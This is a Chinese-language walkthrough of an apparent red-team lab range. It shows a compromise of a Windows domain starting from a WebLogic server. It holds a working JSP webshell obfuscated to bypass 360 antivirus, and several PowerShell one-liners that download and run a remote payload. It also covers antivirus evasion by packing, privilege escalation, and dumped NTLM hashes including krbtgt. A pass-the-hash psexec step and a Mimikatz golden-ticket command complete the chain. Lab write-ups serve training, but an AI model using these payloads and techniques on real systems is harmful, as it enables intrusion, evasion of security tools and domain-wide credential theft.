环境
WEB(初始的状态默认密码无法登录,切换用户 de1ay/1qaz@WSX 登录进去) windows2008
PC win7
DC win2012
WEB服务器需要以管理员身份手动开启服务,在C:\Oracle\Middleware\user_projects\domains\base_domain\bin
下运行批处理程序startWeblogic
即可启动weblogic 管理员账号密码:Administrator/1qaz@WSX
拓扑图
开日
信息收集
>nmap -sV -Pn -p- -O -v -open -T4 192.168.132.147
发现3389,1443,7001
fscan
不试永恒之蓝了,电脑垃圾开三个虚拟机要炸了
扫weblogic
外网打点
直接打
写马
写入位置
https://www.cnblogs.com/sstfy/p/10350915.html
\Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\shell.jsp
\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp_WL_internal\uddiexplorer\5f6ebw\war\shell.jsp
\Oracle\Middleware\user_projects\domains\application\servers\AdminServer\tmp_WL_user\项目名\随机字符\war\
扫到 uddiexplorer
因为有360,整个绕waf的
<%@ page pageEncoding="utf-8"%>
<%@ page import="java.util.Scanner" %>
<HTML>
<title>Just For Fun</title>
<BODY>
<H3>Build By LandGrey</H3>
<FORM METHOD="POST" NAME="form" ACTION="#">
<INPUT TYPE="text" NAME="q">
<INPUT TYPE="submit" VALUE="Fly">
</FORM>
<%
String op="Got Nothing";
String query = request.getParameter("q");
String fileSeparator = String.valueOf(java.io.File.separatorChar);
Boolean isWin;
if(fileSeparator.equals("\\")){
isWin = true;
}else{
isWin = false;
}
if (query != null) {
ProcessBuilder pb;
if(isWin) {
pb = new ProcessBuilder(new String(new byte[]{99, 109, 100}), new String(new byte[]{47, 67}), query);
}else{
pb = new ProcessBuilder(new String(new byte[]{47, 98, 105, 110, 47, 98, 97, 115, 104}), new String(new byte[]{45, 99}), query);
}
Process process = pb.start();
Scanner sc = new Scanner(process.getInputStream()).useDelimiter("\\A");
op = sc.hasNext() ? sc.next() : op;
sc.close();
}
%>
<PRE>
<%= op %>>
</PRE>
</BODY>
</HTML>
想直接上线cs,有360
上线cs过360
https://www.freebuf.com/articles/system/249449.html
先整个冰蝎马
看了篇文章
https://mp.weixin.qq.com/s/wWybPCRsBo0xrvhfYL2YDw
选择powershell免杀
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.132.148:80/a'))"
powershell set-alias -name cseroad -value Invoke-Expression;cseroad(New-Object Net.WebClient).DownloadString('http://192.168.132.148:80/a')
echo Invoke-Expression(new-object net.webclient).downloadstring('http://192.168.132.148:80/a') | powershell -
powershell -c "IEX(New-Object Net.WebClient)."DownloadString"('ht‘+’tp://192.168.52.23:80/a')"
发现还是过不了,上绝招
exe加壳
Virus total
这个还是比较高,但是火绒还是so easy,360一样过
这里稍微提一点,因为weblogic本身是管理员权限,打进去就是管理员,正常情况下,不会一打就是管理员权限的,所以这边再说一下提权的事
Systeminfo查看补丁
这里介绍一款后渗透插件
https://github.com/lintstar/LSTAR
可以看到他的功能多么无敌,这就是神器,杀穿
用ms15-051直接提权
内网信息收集
hash提取
Mimikatz
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
de1ay:1000:aad3b435b51404eeaad3b435b51404ee:3b24c391862f4a8531a245a0217708c4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
拿到主机密码以及mssql密码,存在口令复用,可以发现这个机子被域控用户DC 登录过留下了密码
主机信息收集
Arp -a
发现两个网段,我这个4.4有些功能⑧能用 难受
Ladon 扫下
10.10.10.10/24
之前的arp -a 也能看到
10.10.10.12
10.10.10.81
内网横向移动
利用票据传输横向移动
因为知道域控的对应NTML hash值,
用psexec进行hash传递横向移动,
创建smb监听
设置代理
拿下pc
拿下域控
由此整个环境所有主机全部上线
域控权限维持
利用黄金票据
提取域控hash
Administrator:500:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:82dfc71b72a11ef37d663047bc2088fb:::
de1ay:1001:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
mssql:2103:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
DC$:1002:aad3b435b51404eeaad3b435b51404ee:10055c1f67bbd343a2928e43bfe47745:::
PC$:1105:aad3b435b51404eeaad3b435b51404ee:e8061b2e86ac1581b63f698fd24b9be5:::
WEB$:1603:aad3b435b51404eeaad3b435b51404ee:da3963ba5632be9eecaf6e3650559de8:::
黄金票据是伪造票据授予票据(TGT),也被称为认证票据。TGT仅用于向域控制器上的密钥分配中心(KDC)证明用户已被其他域控制器认证。
黄金票据的条件要求:
1.域名称
2.域的SID值
3.域的KRBTGT账户NTLM密码哈希
4.伪造用户名
黄金票据可以在拥有普通域用户权限和KRBTGT账号的哈希的情况下用来获取域管理员权限,上面已经获得域控的 system 权限了,还可以使用黄金票据做权限维持,当域控权限掉后,在通过域内其他任意机器伪造票据重新获取最高权限。
填好sid 以及NTMLhash
就可以通过其他靶机对DC域控进行操控
也可以手动使用mimikatz
kerberos::golden /admin:test /domain:test.com /sid:S-1-5-21-2756371121-2868759905-3853650604 /krbtgt:161cff084477fe596a5db81874498a24 /ptt